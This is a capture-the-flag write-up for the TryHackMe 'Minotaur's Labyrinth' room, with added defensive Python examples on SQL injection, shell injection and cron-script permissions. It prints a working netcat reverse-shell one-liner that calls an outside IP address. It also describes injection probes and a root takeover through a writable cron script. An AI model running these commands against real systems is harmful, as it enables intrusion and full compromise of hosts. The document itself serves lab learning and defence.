Minotaur's Labyrinth
https://tryhackme.com/room/labyrinth8llv
Flag 1
Let's begin with a basic nmap scan.

A more detailed scan:

We see there are a few open ports. Let's start by digging into the FTP one, since anonymous access is allowed.

We can see a public folder named "pub". Let's see what's inside and download its contents.

We couldn't download the .secret file because it's actually a folder.

Let's download everything and take a look at the messages.

We found the first flag and a couple of messages. The first one tells us someone likes to keep things on a timer (cronjobs??) and the second one basically tells us to look everywhere. Nice info.
Flag 2
After taking a look at the FTP port, let's head to port 80 and see what we can find. At first we can only see a login portal.

What if we try to retrieve information using the "Forgot Password" feature?

Apparently it won't be that easy, so the next step is looking at the source code to see if we find anything interesting. In the source code we find a JavaScript file named "login.js"; if we open it we can see something juicy.

We can write a script to generate the password for Daedalus.

Now let's try to log in with the generated password.


We successfully logged in to the portal. Taking a look around, we can see a search field that allows us to search for people and creatures. Let's try looking for Daedalus.

We get the user and the password, but we don't know any more users, so let's take a look at the source code.

We found a comment saying something about the permissions. Let's see if the search field is vulnerable to SQLi.

After several failed tries we finally found the right payload and retrieved the password hash for the user M!n0taur.
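For context on why a search field like this one ends up leaking another user's hash, here is an added example (not the room's application or schema, which the write-up does not show) of the same search built two ways against a constructed in-memory SQLite table: one that concatenates the term into the query, and one that binds it as a parameter.

```python
"""Added example: a people/creature search built two ways.

The table, names and hash values are constructed placeholders for this
demonstration; they are not data from the box.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Build a small in-memory table with constructed sample rows."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (name TEXT, role TEXT, pwd_hash TEXT)")
    con.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [
            ("daedalus", "user", "PLACEHOLDER_HASH_1"),
            ("minotaur", "admin", "PLACEHOLDER_HASH_2"),
        ],
    )
    return con


def search_unsafe(con: sqlite3.Connection, term: str) -> list:
    """Vulnerable pattern: the search term is spliced into the SQL text.

    A single quote in the input closes the string literal, so the rest of
    the input is parsed as SQL and can widen the WHERE clause to rows the
    caller was never meant to see.
    """
    sql = f"SELECT name, role FROM users WHERE name = '{term}'"
    return con.execute(sql).fetchall()


def search_safe(con: sqlite3.Connection, term: str) -> list:
    """Hardened pattern: the term is bound as a parameter.

    The driver sends the value separately from the statement, so quotes
    and keywords inside it are only ever compared as data.
    """
    return con.execute(
        "SELECT name, role FROM users WHERE name = ?", (term,)
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    probe = "x' OR '1'='1"  # a term that carries a quote
    print("unsafe:", search_unsafe(db, probe))  # returns every row
    print("safe:  ", search_safe(db, probe))    # returns nothing: no such name
```

The parameterised version is the fix; the application-side "permissions" comment the write-up mentions would not help, because the query itself decides which rows come back.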

Let's crack the hash and log in to the new account.

We can see the second flag in the top navbar.

User Flag
If we access the "Scret_Stuff" folder we see a text field that echoes everything we write.

Let's try to escape the echo command with a basic " | whoami".

We were able to escape the command, so now we can try to get a reverse shell using base64 encoding.
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.9.211.205 9001 >/tmp/f
We have to remove the "=" symbol to be able to get a reverse shell (based on the hint given in the box).

Don't forget to start a listener.

We're in. Let's get the user flag.
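The echo field works because user input reaches a shell as part of a command line. The following added example (illustrative Python, not the box's real back end, which the write-up never shows) puts the vulnerable pattern next to two hardened forms and a small detection helper a defender could run over request logs.

```python
"""Added example: an "echo what you type" feature, vulnerable and hardened.

Illustrative code only; the room's application is not shown in the write-up.
"""
import re
import shlex
import subprocess

# Characters that let a shell start a second command or substitute output.
_SHELL_META = re.compile(r"[|;&$`()<>\n\\]")


def echo_unsafe(text: str) -> str:
    """Vulnerable pattern: input is spliced into a command string run by /bin/sh.

    Anything after a '|' or ';' in the input is executed as its own command.
    """
    proc = subprocess.run(f"echo {text}", shell=True,
                          capture_output=True, text=True)
    return proc.stdout


def echo_safe(text: str) -> str:
    """Hardened pattern: no shell at all; the input is one argv entry."""
    proc = subprocess.run(["echo", text], capture_output=True, text=True)
    return proc.stdout


def echo_quoted(text: str) -> str:
    """Hardened pattern when a shell is unavoidable: quote the input so the
    shell treats it as a single literal word."""
    proc = subprocess.run(f"echo {shlex.quote(text)}", shell=True,
                          capture_output=True, text=True)
    return proc.stdout


def looks_like_injection(text: str) -> bool:
    """Detection helper: flag submitted values that carry shell metacharacters.

    Useful as a log-review or WAF rule; it is not a substitute for the fixes
    above, since legitimate text can contain these characters too.
    """
    return bool(_SHELL_META.search(text))


if __name__ == "__main__":
    probe = "hello; echo injected"  # constructed input with a second command
    print("unsafe :", repr(echo_unsafe(probe)))   # second command ran
    print("safe   :", repr(echo_safe(probe)))     # printed literally
    print("quoted :", repr(echo_quoted(probe)))   # printed literally
    print("flagged:", looks_like_injection(probe))
```

The argv form is the preferred fix; `shlex.quote` is the fallback for code that must keep building a shell string.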

Root Flag
After getting the user flag we just have to look around the box. We see uncommon folders in /. Remember that one of the messages we downloaded at the beginning said someone likes to use timers, and there's a "timers" folder, so let's head to that one.

We see there's a file named "timer.sh" that is writable by our current user. Since the name is "timer" we're guessing it's a cronjob. Let's replace the content of the file with a reverse shell.

Let's save the changes and start a listener on port 9002.

We got root.
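The root step depends on a single misconfiguration: a script that a scheduler runs as root is writable by an unprivileged user. As an added example (not from the room), the audit below walks a directory of scheduled scripts and reports anything a non-owner could modify. It builds a constructed look-alike of the "timers" folder in a temporary directory so it runs anywhere; the file names are assumptions.

```python
"""Added example: audit a directory of timer/cron scripts for files that a
non-owner can modify.

The directory and its files are constructed in a temp dir for the demo;
they are not the box's real /timers contents.
"""
import os
import stat
import tempfile
from pathlib import Path


def writable_by_others(path: Path) -> bool:
    """True if the group or world write bit is set."""
    mode = path.stat().st_mode
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_timer_dir(directory: Path) -> list:
    """Return names of entries in `directory` a non-owner could tamper with.

    Both cases matter to a scheduler running as root: a writable script can
    be edited in place, and a writable directory (without the sticky bit)
    lets a user replace the script wholesale.
    """
    findings = []
    dir_mode = directory.stat().st_mode
    if writable_by_others(directory) and not dir_mode & stat.S_ISVTX:
        findings.append(".")  # the directory itself is the weak point
    for entry in sorted(directory.iterdir()):
        if entry.is_file() and writable_by_others(entry):
            findings.append(entry.name)
    return findings


def demo() -> list:
    """Create a constructed timers folder: one sane script, one weak one."""
    tmp = Path(tempfile.mkdtemp())
    good = tmp / "backup.sh"
    weak = tmp / "timer.sh"
    good.write_text("#!/bin/sh\necho backup\n")
    weak.write_text("#!/bin/sh\necho tick\n")
    os.chmod(good, 0o755)  # owner-writable only: fine for a root cron target
    os.chmod(weak, 0o777)  # the weak setting: anyone can rewrite what root runs
    return audit_timer_dir(tmp)


if __name__ == "__main__":
    print("tamperable entries:", demo())  # expect ['timer.sh']
```

The fix for the finding is the usual one: scripts run by root's scheduler should be owned by root with mode 0755 or tighter, in a directory that is likewise not writable by other users.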